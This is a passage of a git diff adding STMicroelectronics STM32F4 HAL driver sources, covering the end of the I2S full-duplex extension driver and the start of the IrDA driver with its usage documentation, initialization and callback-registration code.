I2S_FLAG_RXNE) == I2S_FLAG_RXNE) && ((i2scr2 & I2S_IT_RXNE) != RESET)) + { + /* When the I2S mode is configured as I2S_MODE_MASTER_RX or I2S_MODE_SLAVE_RX, + the I2S RXNE interrupt will be generated to manage the full-duplex receive phase. */ + I2SEx_RxISR_I2S(hi2s); + } + + /* I2S Overrun error interrupt occurred -------------------------------------*/ + if (((i2ssr & I2S_FLAG_OVR) == I2S_FLAG_OVR) && ((i2scr2 & I2S_IT_ERR) != RESET)) + { + /* Disable RXNE and ERR interrupt */ + __HAL_I2S_DISABLE_IT(hi2s, (I2S_IT_RXNE | I2S_IT_ERR)); + + /* Disable TXE and ERR interrupt */ + __HAL_I2SEXT_DISABLE_IT(hi2s, (I2S_IT_TXE | I2S_IT_ERR)); + + /* Set the I2S State ready */ + hi2s->State = HAL_I2S_STATE_READY; + + /* Set the error code and execute error callback*/ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_OVR); + /* Call user error callback */ +#if (USE_HAL_I2S_REGISTER_CALLBACKS == 1U) + hi2s->ErrorCallback(hi2s); +#else + HAL_I2S_ErrorCallback(hi2s); +#endif /* USE_HAL_I2S_REGISTER_CALLBACKS */ + } + + /* I2Sext Underrun error interrupt occurred -------------------------------*/ + if (((i2sextsr & I2S_FLAG_UDR) == I2S_FLAG_UDR) && ((i2sextcr2 & I2S_IT_ERR) != RESET)) + { + /* Disable TXE and ERR interrupt */ + __HAL_I2SEXT_DISABLE_IT(hi2s, (I2S_IT_TXE | I2S_IT_ERR)); + + /* Disable RXNE and ERR interrupt */ + __HAL_I2S_DISABLE_IT(hi2s, (I2S_IT_RXNE | I2S_IT_ERR)); + + /* Set the I2S State ready */ + hi2s->State = HAL_I2S_STATE_READY; + + /* Set the error code and execute error callback*/ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_UDR); + /* Call user error callback */ +#if (USE_HAL_I2S_REGISTER_CALLBACKS == 1U) + hi2s->ErrorCallback(hi2s); +#else + HAL_I2S_ErrorCallback(hi2s); +#endif /* USE_HAL_I2S_REGISTER_CALLBACKS */ + } + } +} + +/** + * @brief Tx and Rx Transfer half completed callback + * @param hi2s I2S handle + * @retval None + */ +__weak void HAL_I2SEx_TxRxHalfCpltCallback(I2S_HandleTypeDef *hi2s) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hi2s); + + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_I2SEx_TxRxHalfCpltCallback could be implemented in the user file + */ +} + +/** + * @brief Tx and Rx Transfer completed callback + * @param hi2s I2S handle + * @retval None + */ +__weak void HAL_I2SEx_TxRxCpltCallback(I2S_HandleTypeDef *hi2s) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hi2s); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_I2SEx_TxRxCpltCallback could be implemented in the user file + */ +} + +/** + * @} + */ + +/** + * @} + */ + +/** @addtogroup I2SEx_Private_Functions I2S Extended Private Functions + * @{ + */ + +/** + * @brief DMA I2S transmit receive process half complete callback + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void I2SEx_TxRxDMAHalfCplt(DMA_HandleTypeDef *hdma) +{ + I2S_HandleTypeDef *hi2s = (I2S_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + /* Call user TxRx Half complete callback */ +#if (USE_HAL_I2S_REGISTER_CALLBACKS == 1U) + hi2s->TxRxHalfCpltCallback(hi2s); +#else + HAL_I2SEx_TxRxHalfCpltCallback(hi2s); +#endif /* USE_HAL_I2S_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA I2S transmit receive process complete callback + * @param hdma pointer to a DMA_HandleTypeDef structure that contains + * the configuration information for the specified DMA module. + * @retval None + */ +static void I2SEx_TxRxDMACplt(DMA_HandleTypeDef *hdma) +{ + I2S_HandleTypeDef *hi2s = (I2S_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + /* If DMA is configured in DMA_NORMAL mode */ + if (hdma->Init.Mode == DMA_NORMAL) + { + if (((hi2s->Instance->I2SCFGR & SPI_I2SCFGR_I2SCFG) == I2S_MODE_MASTER_TX) || \ + ((hi2s->Instance->I2SCFGR & SPI_I2SCFGR_I2SCFG) == I2S_MODE_SLAVE_TX)) + /* Disable Tx & Rx DMA Requests */ + { + CLEAR_BIT(I2SxEXT(hi2s->Instance)->CR2, SPI_CR2_RXDMAEN); + CLEAR_BIT(hi2s->Instance->CR2, SPI_CR2_TXDMAEN); + } + else + { + CLEAR_BIT(hi2s->Instance->CR2, SPI_CR2_RXDMAEN); + CLEAR_BIT(I2SxEXT(hi2s->Instance)->CR2, SPI_CR2_TXDMAEN); + } + + hi2s->RxXferCount = 0U; + hi2s->TxXferCount = 0U; + + hi2s->State = HAL_I2S_STATE_READY; + } + + /* Call user TxRx complete callback */ +#if (USE_HAL_I2S_REGISTER_CALLBACKS == 1U) + hi2s->TxRxCpltCallback(hi2s); +#else + HAL_I2SEx_TxRxCpltCallback(hi2s); +#endif /* USE_HAL_I2S_REGISTER_CALLBACKS */ +} + +/** + * @brief DMA I2S communication error callback + * @param hdma DMA handle + * @retval None + */ +static void I2SEx_TxRxDMAError(DMA_HandleTypeDef *hdma) +{ + I2S_HandleTypeDef *hi2s = (I2S_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + /* Disable Rx and Tx DMA Request */ + CLEAR_BIT(hi2s->Instance->CR2, (SPI_CR2_RXDMAEN | SPI_CR2_TXDMAEN)); + CLEAR_BIT(I2SxEXT(hi2s->Instance)->CR2, (SPI_CR2_RXDMAEN | SPI_CR2_TXDMAEN)); + + hi2s->TxXferCount = 0U; + hi2s->RxXferCount = 0U; + + hi2s->State = HAL_I2S_STATE_READY; + + /* Set the error code and execute error callback*/ + SET_BIT(hi2s->ErrorCode, HAL_I2S_ERROR_DMA); + /* Call user error callback */ +#if (USE_HAL_I2S_REGISTER_CALLBACKS == 1U) + hi2s->ErrorCallback(hi2s); +#else + HAL_I2S_ErrorCallback(hi2s); +#endif /* USE_HAL_I2S_REGISTER_CALLBACKS */ +} + +/** + * @brief I2S Full-Duplex IT handler transmit function + * @param hi2s I2S handle + * @retval None + */ +static void I2SEx_TxISR_I2S(I2S_HandleTypeDef *hi2s) +{ + /* Write Data on DR register */ + hi2s->Instance->DR = (*hi2s->pTxBuffPtr++); + hi2s->TxXferCount--; + + if (hi2s->TxXferCount == 0U) + { + /* Disable TXE and ERR interrupt */ + __HAL_I2S_DISABLE_IT(hi2s, (I2S_IT_TXE | I2S_IT_ERR)); + + if (hi2s->RxXferCount == 0U) + { + hi2s->State = HAL_I2S_STATE_READY; + /* Call user TxRx complete callback */ +#if (USE_HAL_I2S_REGISTER_CALLBACKS == 1U) + hi2s->TxRxCpltCallback(hi2s); +#else + HAL_I2SEx_TxRxCpltCallback(hi2s); +#endif /* USE_HAL_I2S_REGISTER_CALLBACKS */ + } + } +} + +/** + * @brief I2SExt Full-Duplex IT handler transmit function + * @param hi2s I2S handle + * @retval None + */ +static void I2SEx_TxISR_I2SExt(I2S_HandleTypeDef *hi2s) +{ + /* Write Data on DR register */ + I2SxEXT(hi2s->Instance)->DR = (*hi2s->pTxBuffPtr++); + hi2s->TxXferCount--; + + if (hi2s->TxXferCount == 0U) + { + /* Disable I2Sext TXE and ERR interrupt */ + __HAL_I2SEXT_DISABLE_IT(hi2s, (I2S_IT_TXE | I2S_IT_ERR)); + + if (hi2s->RxXferCount == 0U) + { + hi2s->State = HAL_I2S_STATE_READY; + /* Call user TxRx complete callback */ +#if (USE_HAL_I2S_REGISTER_CALLBACKS == 1U) + hi2s->TxRxCpltCallback(hi2s); +#else + HAL_I2SEx_TxRxCpltCallback(hi2s); +#endif /* USE_HAL_I2S_REGISTER_CALLBACKS */ + } + } +} + +/** + * @brief I2S Full-Duplex IT handler receive function + * @param hi2s I2S handle + * @retval None + */ +static void I2SEx_RxISR_I2S(I2S_HandleTypeDef *hi2s) +{ + /* Read Data from DR register */ + (*hi2s->pRxBuffPtr++) = hi2s->Instance->DR; + hi2s->RxXferCount--; + + if (hi2s->RxXferCount == 0U) + { + /* Disable RXNE and ERR interrupt */ + __HAL_I2S_DISABLE_IT(hi2s, (I2S_IT_RXNE | I2S_IT_ERR)); + + if (hi2s->TxXferCount == 0U) + { + hi2s->State = HAL_I2S_STATE_READY; + /* Call user TxRx complete callback */ +#if (USE_HAL_I2S_REGISTER_CALLBACKS == 1U) + hi2s->TxRxCpltCallback(hi2s); +#else + HAL_I2SEx_TxRxCpltCallback(hi2s); +#endif /* USE_HAL_I2S_REGISTER_CALLBACKS */ + } + } +} + +/** + * @brief I2SExt Full-Duplex IT handler receive function + * @param hi2s I2S handle + * @retval None + */ +static void I2SEx_RxISR_I2SExt(I2S_HandleTypeDef *hi2s) +{ + /* Read Data from DR register */ + (*hi2s->pRxBuffPtr++) = I2SxEXT(hi2s->Instance)->DR; + hi2s->RxXferCount--; + + if (hi2s->RxXferCount == 0U) + { + /* Disable I2Sext RXNE and ERR interrupt */ + __HAL_I2SEXT_DISABLE_IT(hi2s, (I2S_IT_RXNE | I2S_IT_ERR)); + + if (hi2s->TxXferCount == 0U) + { + hi2s->State = HAL_I2S_STATE_READY; + /* Call user TxRx complete callback */ +#if (USE_HAL_I2S_REGISTER_CALLBACKS == 1U) + hi2s->TxRxCpltCallback(hi2s); +#else + HAL_I2SEx_TxRxCpltCallback(hi2s); +#endif /* USE_HAL_I2S_REGISTER_CALLBACKS */ + } + } +} + +/** + * @brief This function handles I2S Communication Timeout. + * @param hi2s I2S handle + * @param Flag Flag checked + * @param State Value of the flag expected + * @param Timeout Duration of the timeout + * @param i2sUsed I2S instance reference + * @retval HAL status + */ +static HAL_StatusTypeDef I2SEx_FullDuplexWaitFlagStateUntilTimeout(I2S_HandleTypeDef *hi2s, + uint32_t Flag, + uint32_t State, + uint32_t Timeout, + I2S_UseTypeDef i2sUsed) +{ + uint32_t tickstart = HAL_GetTick(); + + if (i2sUsed == I2S_USE_I2S) + { + /* Wait until flag is reset */ + while (((__HAL_I2S_GET_FLAG(hi2s, Flag)) ? SET : RESET) != State) + { + if (Timeout != HAL_MAX_DELAY) + { + if ((Timeout == 0U) || ((HAL_GetTick() - tickstart) > Timeout)) + { + /* Set the I2S State ready */ + hi2s->State = HAL_I2S_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2s); + + return HAL_TIMEOUT; + } + } + } + } + else /* i2sUsed == I2S_USE_I2SEXT */ + { + /* Wait until flag is reset */ + while (((__HAL_I2SEXT_GET_FLAG(hi2s, Flag)) ? SET : RESET) != State) + { + if (Timeout != HAL_MAX_DELAY) + { + if ((Timeout == 0U) || ((HAL_GetTick() - tickstart) > Timeout)) + { + /* Set the I2S State ready */ + hi2s->State = HAL_I2S_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2s); + + return HAL_TIMEOUT; + } + } + } + } + return HAL_OK; +} + +/** + * @} + */ +#endif /* SPI_I2S_FULLDUPLEX_SUPPORT */ + +/** + * @} + */ +#endif /* HAL_I2S_MODULE_ENABLED */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_irda.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_irda.c new file mode 100644 index 000000000..29974d61b --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_irda.c @@ -0,0 +1,2672 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_irda.c + * @author MCD Application Team + * @brief IRDA HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the IrDA SIR ENDEC block (IrDA): + * + Initialization and de-initialization functions + * + IO operation functions + * + Peripheral Control functions + * + Peripheral State and Errors functions + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + The IRDA HAL driver can be used as follows: + + (#) Declare a IRDA_HandleTypeDef handle structure (eg. IRDA_HandleTypeDef hirda). + (#) Initialize the IRDA low level resources by implementing the HAL_IRDA_MspInit() API: + (##) Enable the USARTx interface clock. + (##) IRDA pins configuration: + (+++) Enable the clock for the IRDA GPIOs. + (+++) Configure IRDA pins as alternate function pull-up. + (##) NVIC configuration if you need to use interrupt process (HAL_IRDA_Transmit_IT() + and HAL_IRDA_Receive_IT() APIs): + (+++) Configure the USARTx interrupt priority. + (+++) Enable the NVIC USART IRQ handle. + (##) DMA Configuration if you need to use DMA process (HAL_IRDA_Transmit_DMA() + and HAL_IRDA_Receive_DMA() APIs): + (+++) Declare a DMA handle structure for the Tx/Rx stream. + (+++) Enable the DMAx interface clock. + (+++) Configure the declared DMA handle structure with the required Tx/Rx parameters. + (+++) Configure the DMA Tx/Rx stream. + (+++) Associate the initialized DMA handle to the IRDA DMA Tx/Rx handle. + (+++) Configure the priority and enable the NVIC for the transfer complete interrupt on the DMA Tx/Rx stream. + (+++) Configure the IRDAx interrupt priority and enable the NVIC USART IRQ handle + (used for last byte sending completion detection in DMA non circular mode) + + (#) Program the Baud Rate, Word Length, Parity, IrDA Mode, Prescaler + and Mode(Receiver/Transmitter) in the hirda Init structure. + + (#) Initialize the IRDA registers by calling the HAL_IRDA_Init() API: + (++) This API configures also the low level Hardware GPIO, CLOCK, CORTEX...etc) + by calling the customized HAL_IRDA_MspInit() API. + + -@@- The specific IRDA interrupts (Transmission complete interrupt, + RXNE interrupt and Error Interrupts) will be managed using the macros + __HAL_IRDA_ENABLE_IT() and __HAL_IRDA_DISABLE_IT() inside the transmit and receive process. + + (#) Three operation modes are available within this driver : + + *** Polling mode IO operation *** + ================================= + [..] + (+) Send an amount of data in blocking mode using HAL_IRDA_Transmit() + (+) Receive an amount of data in blocking mode using HAL_IRDA_Receive() + + *** Interrupt mode IO operation *** + =================================== + [..] + (+) Send an amount of data in non blocking mode using HAL_IRDA_Transmit_IT() + (+) At transmission end of transfer HAL_IRDA_TxCpltCallback is executed and user can + add his own code by customization of function pointer HAL_IRDA_TxCpltCallback + (+) Receive an amount of data in non blocking mode using HAL_IRDA_Receive_IT() + (+) At reception end of transfer HAL_IRDA_RxCpltCallback is executed and user can + add his own code by customization of function pointer HAL_IRDA_RxCpltCallback + (+) In case of transfer Error, HAL_IRDA_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_IRDA_ErrorCallback + + *** DMA mode IO operation *** + ============================= + [..] + (+) Send an amount of data in non blocking mode (DMA) using HAL_IRDA_Transmit_DMA() + (+) At transmission end of half transfer HAL_IRDA_TxHalfCpltCallback is executed and user can + add his own code by customization of function pointer HAL_IRDA_TxHalfCpltCallback + (+) At transmission end of transfer HAL_IRDA_TxCpltCallback is executed and user can + add his own code by customization of function pointer HAL_IRDA_TxCpltCallback + (+) Receive an amount of data in non blocking mode (DMA) using HAL_IRDA_Receive_DMA() + (+) At reception end of half transfer HAL_IRDA_RxHalfCpltCallback is executed and user can + add his own code by customization of function pointer HAL_IRDA_RxHalfCpltCallback + (+) At reception end of transfer HAL_IRDA_RxCpltCallback is executed and user can + add his own code by customization of function pointer HAL_IRDA_RxCpltCallback + (+) In case of transfer Error, HAL_IRDA_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_IRDA_ErrorCallback + (+) Pause the DMA Transfer using HAL_IRDA_DMAPause() + (+) Resume the DMA Transfer using HAL_IRDA_DMAResume() + (+) Stop the DMA Transfer using HAL_IRDA_DMAStop() + + *** IRDA HAL driver macros list *** + =================================== + [..] + Below the list of most used macros in IRDA HAL driver. + + (+) __HAL_IRDA_ENABLE: Enable the IRDA peripheral + (+) __HAL_IRDA_DISABLE: Disable the IRDA peripheral + (+) __HAL_IRDA_GET_FLAG : Check whether the specified IRDA flag is set or not + (+) __HAL_IRDA_CLEAR_FLAG : Clear the specified IRDA pending flag + (+) __HAL_IRDA_ENABLE_IT: Enable the specified IRDA interrupt + (+) __HAL_IRDA_DISABLE_IT: Disable the specified IRDA interrupt + (+) __HAL_IRDA_GET_IT_SOURCE: Check whether the specified IRDA interrupt has occurred or not + + [..] + (@) You can refer to the IRDA HAL driver header file for more useful macros + + ##### Callback registration ##### + ================================== + + [..] + The compilation define USE_HAL_IRDA_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + + [..] + Use Function HAL_IRDA_RegisterCallback() to register a user callback. + Function HAL_IRDA_RegisterCallback() allows to register following callbacks: + (+) TxHalfCpltCallback : Tx Half Complete Callback. + (+) TxCpltCallback : Tx Complete Callback. + (+) RxHalfCpltCallback : Rx Half Complete Callback. + (+) RxCpltCallback : Rx Complete Callback. + (+) ErrorCallback : Error Callback. + (+) AbortCpltCallback : Abort Complete Callback. + (+) AbortTransmitCpltCallback : Abort Transmit Complete Callback. + (+) AbortReceiveCpltCallback : Abort Receive Complete Callback. + (+) MspInitCallback : IRDA MspInit. + (+) MspDeInitCallback : IRDA MspDeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + [..] + Use function HAL_IRDA_UnRegisterCallback() to reset a callback to the default + weak (surcharged) function. + HAL_IRDA_UnRegisterCallback() takes as parameters the HAL peripheral handle, + and the Callback ID. + This function allows to reset following callbacks: + (+) TxHalfCpltCallback : Tx Half Complete Callback. + (+) TxCpltCallback : Tx Complete Callback. + (+) RxHalfCpltCallback : Rx Half Complete Callback. + (+) RxCpltCallback : Rx Complete Callback. + (+) ErrorCallback : Error Callback. + (+) AbortCpltCallback : Abort Complete Callback. + (+) AbortTransmitCpltCallback : Abort Transmit Complete Callback. + (+) AbortReceiveCpltCallback : Abort Receive Complete Callback. + (+) MspInitCallback : IRDA MspInit. + (+) MspDeInitCallback : IRDA MspDeInit. + + [..] + By default, after the HAL_IRDA_Init() and when the state is HAL_IRDA_STATE_RESET + all callbacks are set to the corresponding weak (surcharged) functions: + examples HAL_IRDA_TxCpltCallback(), HAL_IRDA_RxHalfCpltCallback(). + Exception done for MspInit and MspDeInit functions that are respectively + reset to the legacy weak (surcharged) functions in the HAL_IRDA_Init() + and HAL_IRDA_DeInit() only when these callbacks are null (not registered beforehand). + If not, MspInit or MspDeInit are not null, the HAL_IRDA_Init() and HAL_IRDA_DeInit() + keep and use the user MspInit/MspDeInit callbacks (registered beforehand). + + [..] + Callbacks can be registered/unregistered in HAL_IRDA_STATE_READY state only. + Exception done MspInit/MspDeInit that can be registered/unregistered + in HAL_IRDA_STATE_READY or HAL_IRDA_STATE_RESET state, thus registered (user) + MspInit/DeInit callbacks can be used during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using HAL_IRDA_RegisterCallback() before calling HAL_IRDA_DeInit() + or HAL_IRDA_Init() function. + + [..] + When The compilation define USE_HAL_IRDA_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registration feature is not available + and weak (surcharged) callbacks are used. + + @endverbatim + [..] + (@) Additional remark: If the parity is enabled, then the MSB bit of the data written + in the data register is transmitted but is changed by the parity bit. + Depending on the frame length defined by the M bit (8-bits or 9-bits), + the possible IRDA frame formats are as listed in the following table: + +-------------------------------------------------------------+ + | M bit | PCE bit | IRDA frame | + |---------------------|---------------------------------------| + | 0 | 0 | | SB | 8 bit data | 1 STB | | + |---------|-----------|---------------------------------------| + | 0 | 1 | | SB | 7 bit data | PB | 1 STB | | + |---------|-----------|---------------------------------------| + | 1 | 0 | | SB | 9 bit data | 1 STB | | + |---------|-----------|---------------------------------------| + | 1 | 1 | | SB | 8 bit data | PB | 1 STB | | + +-------------------------------------------------------------+ + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup IRDA IRDA + * @brief HAL IRDA module driver + * @{ + */ + +#ifdef HAL_IRDA_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/** @addtogroup IRDA_Private_Functions + * @{ + */ +#if (USE_HAL_IRDA_REGISTER_CALLBACKS == 1) +void IRDA_InitCallbacksToDefault(IRDA_HandleTypeDef *hirda); +#endif /* USE_HAL_IRDA_REGISTER_CALLBACKS */ +static void IRDA_SetConfig(IRDA_HandleTypeDef *hirda); +static HAL_StatusTypeDef IRDA_Transmit_IT(IRDA_HandleTypeDef *hirda); +static HAL_StatusTypeDef IRDA_EndTransmit_IT(IRDA_HandleTypeDef *hirda); +static HAL_StatusTypeDef IRDA_Receive_IT(IRDA_HandleTypeDef *hirda); +static void IRDA_DMATransmitCplt(DMA_HandleTypeDef *hdma); +static void IRDA_DMATransmitHalfCplt(DMA_HandleTypeDef *hdma); +static void IRDA_DMAReceiveCplt(DMA_HandleTypeDef *hdma); +static void IRDA_DMAReceiveHalfCplt(DMA_HandleTypeDef *hdma); +static void IRDA_DMAError(DMA_HandleTypeDef *hdma); +static void IRDA_DMAAbortOnError(DMA_HandleTypeDef *hdma); +static void IRDA_DMATxAbortCallback(DMA_HandleTypeDef *hdma); +static void IRDA_DMARxAbortCallback(DMA_HandleTypeDef *hdma); +static void IRDA_DMATxOnlyAbortCallback(DMA_HandleTypeDef *hdma); +static void IRDA_DMARxOnlyAbortCallback(DMA_HandleTypeDef *hdma); +static HAL_StatusTypeDef IRDA_WaitOnFlagUntilTimeout(IRDA_HandleTypeDef *hirda, uint32_t Flag, FlagStatus Status, uint32_t Tickstart, uint32_t Timeout); +static void IRDA_EndTxTransfer(IRDA_HandleTypeDef *hirda); +static void IRDA_EndRxTransfer(IRDA_HandleTypeDef *hirda); +/** + * @} + */ + +/* Exported functions --------------------------------------------------------*/ +/** @defgroup IRDA_Exported_Functions IrDA Exported Functions + * @{ + */ + +/** @defgroup IRDA_Exported_Functions_Group1 IrDA Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + + ============================================================================== + ##### Initialization and Configuration functions ##### + ============================================================================== + [..] + This subsection provides a set of functions allowing to initialize the USARTx or the UARTy + in asynchronous IrDA mode. + (+) For the asynchronous mode only these parameters can be configured: + (++) BaudRate + (++) WordLength + (++) Parity: If the parity is enabled, then the MSB bit of the data written + in the data register is transmitted but is changed by the parity bit. + Depending on the frame length defined by the M bit (8-bits or 9-bits), + please refer to Reference manual for possible IRDA frame formats. + (++) Prescaler: A pulse of width less than two and greater than one PSC period(s) may or may + not be rejected. The receiver set up time should be managed by software. The IrDA physical layer + specification specifies a minimum of 10 ms delay between transmission and + reception (IrDA is a half duplex protocol). + (++) Mode: Receiver/transmitter modes + (++) IrDAMode: the IrDA can operate in the Normal mode or in the Low power mode. + [..] + The HAL_IRDA_Init() API follows IRDA configuration procedures (details for the procedures + are available in reference manual). + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the IRDA mode according to the specified + * parameters in the IRDA_InitTypeDef and create the associated handle. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_IRDA_Init(IRDA_HandleTypeDef *hirda) +{ + /* Check the IRDA handle allocation */ + if (hirda == NULL) + { + return HAL_ERROR; + } + + /* Check the IRDA instance parameters */ + assert_param(IS_IRDA_INSTANCE(hirda->Instance)); + /* Check the IRDA mode parameter in the IRDA handle */ + assert_param(IS_IRDA_POWERMODE(hirda->Init.IrDAMode)); + + if (hirda->gState == HAL_IRDA_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hirda->Lock = HAL_UNLOCKED; + +#if USE_HAL_IRDA_REGISTER_CALLBACKS == 1 + IRDA_InitCallbacksToDefault(hirda); + + if (hirda->MspInitCallback == NULL) + { + hirda->MspInitCallback = HAL_IRDA_MspInit; + } + + /* Init the low level hardware */ + hirda->MspInitCallback(hirda); +#else + /* Init the low level hardware : GPIO, CLOCK */ + HAL_IRDA_MspInit(hirda); +#endif /* USE_HAL_IRDA_REGISTER_CALLBACKS */ + } + + hirda->gState = HAL_IRDA_STATE_BUSY; + + /* Disable the IRDA peripheral */ + __HAL_IRDA_DISABLE(hirda); + + /* Set the IRDA communication parameters */ + IRDA_SetConfig(hirda); + + /* In IrDA mode, the following bits must be kept cleared: + - LINEN, STOP and CLKEN bits in the USART_CR2 register, + - SCEN and HDSEL bits in the USART_CR3 register.*/ + CLEAR_BIT(hirda->Instance->CR2, (USART_CR2_LINEN | USART_CR2_STOP | USART_CR2_CLKEN)); + CLEAR_BIT(hirda->Instance->CR3, (USART_CR3_SCEN | USART_CR3_HDSEL)); + + /* Enable the IRDA peripheral */ + __HAL_IRDA_ENABLE(hirda); + + /* Set the prescaler */ + MODIFY_REG(hirda->Instance->GTPR, USART_GTPR_PSC, hirda->Init.Prescaler); + + /* Configure the IrDA mode */ + MODIFY_REG(hirda->Instance->CR3, USART_CR3_IRLP, hirda->Init.IrDAMode); + + /* Enable the IrDA mode by setting the IREN bit in the CR3 register */ + SET_BIT(hirda->Instance->CR3, USART_CR3_IREN); + + /* Initialize the IRDA state*/ + hirda->ErrorCode = HAL_IRDA_ERROR_NONE; + hirda->gState = HAL_IRDA_STATE_READY; + hirda->RxState = HAL_IRDA_STATE_READY; + + return HAL_OK; +} + +/** + * @brief DeInitializes the IRDA peripheral + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_IRDA_DeInit(IRDA_HandleTypeDef *hirda) +{ + /* Check the IRDA handle allocation */ + if (hirda == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_IRDA_INSTANCE(hirda->Instance)); + + hirda->gState = HAL_IRDA_STATE_BUSY; + + /* Disable the Peripheral */ + __HAL_IRDA_DISABLE(hirda); + + /* DeInit the low level hardware */ +#if USE_HAL_IRDA_REGISTER_CALLBACKS == 1 + if (hirda->MspDeInitCallback == NULL) + { + hirda->MspDeInitCallback = HAL_IRDA_MspDeInit; + } + /* DeInit the low level hardware */ + hirda->MspDeInitCallback(hirda); +#else + HAL_IRDA_MspDeInit(hirda); +#endif /* USE_HAL_IRDA_REGISTER_CALLBACKS */ + + hirda->ErrorCode = HAL_IRDA_ERROR_NONE; + + hirda->gState = HAL_IRDA_STATE_RESET; + hirda->RxState = HAL_IRDA_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(hirda); + + return HAL_OK; +} + +/** + * @brief IRDA MSP Init. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @retval None + */ +__weak void HAL_IRDA_MspInit(IRDA_HandleTypeDef *hirda) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hirda); + + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_IRDA_MspInit can be implemented in the user file + */ +} + +/** + * @brief IRDA MSP DeInit. + * @param hirda Pointer to a IRDA_HandleTypeDef structure that contains + * the configuration information for the specified IRDA module. + * @retval None + */ +__weak void HAL_IRDA_MspDeInit(IRDA_HandleTypeDef *hirda) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hirda); + + /* NOTE: This function should not be modified, when the callback is needed, + the HAL_IRDA_MspDeInit can be implemented in the user file + */ +} + +#if (USE_HAL_IRDA_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User IRDA Callback + * To be used instead of the weak predefined callback + * @param hirda irda handle + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_IRDA_TX_HALFCOMPLETE_CB_ID Tx Half Complete Callback ID + * @arg @ref HAL_IRDA_TX_COMPLETE_CB_ID Tx Complete Callback ID + * @arg @ref HAL_IRDA_RX_HALFCOMPLETE_CB_ID Rx Half Complete Callback ID + * @arg @ref HAL_IRDA_RX_COMPLETE_CB_ID Rx Complete Callback ID + * @arg @ref HAL_IRDA_ERROR_CB_ID Error Callback ID + * @arg @ref HAL_IRDA_ABORT_COMPLETE_CB_ID Abort Complete Callback ID + * @arg @ref HAL_IRDA_ABORT_TRANSMIT_COMPLETE_CB_ID Abort Transmit Complete Callback ID + * @arg @ref HAL_IRDA_ABORT_RECEIVE_COMPLETE_CB_ID Abort Receive Complete Callback ID + * @arg @ref HAL_IRDA_MSPINIT_CB_ID MspInit Callback ID + * @arg @ref HAL_IRDA_MSPDEINIT_CB_ID MspDeInit Callback ID + * @param pCallback pointer to the Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_IRDA_RegisterCallback(IRDA_HandleTypeDef *hirda, HAL_IRDA_CallbackIDTypeDef CallbackID, pIRDA_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hirda->ErrorCode |= HAL_IRDA_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(hirda); + + if (hirda->gState == HAL_IRDA_STATE_READY) + { + switch (CallbackID) + { + case HAL_IRDA_TX_HALFCOMPLETE_CB_ID : + hirda->TxHalfCpltCallback = pCallback; + break; + + case HAL_IRDA_TX_COMPLETE_CB_ID : + hirda->TxCpltCallback = pCallback; + break; + + case HAL_IRDA_RX_HALFCOMPLETE_CB_ID : + hirda->RxHalfCpltCallback = pCallback; + break; + + case 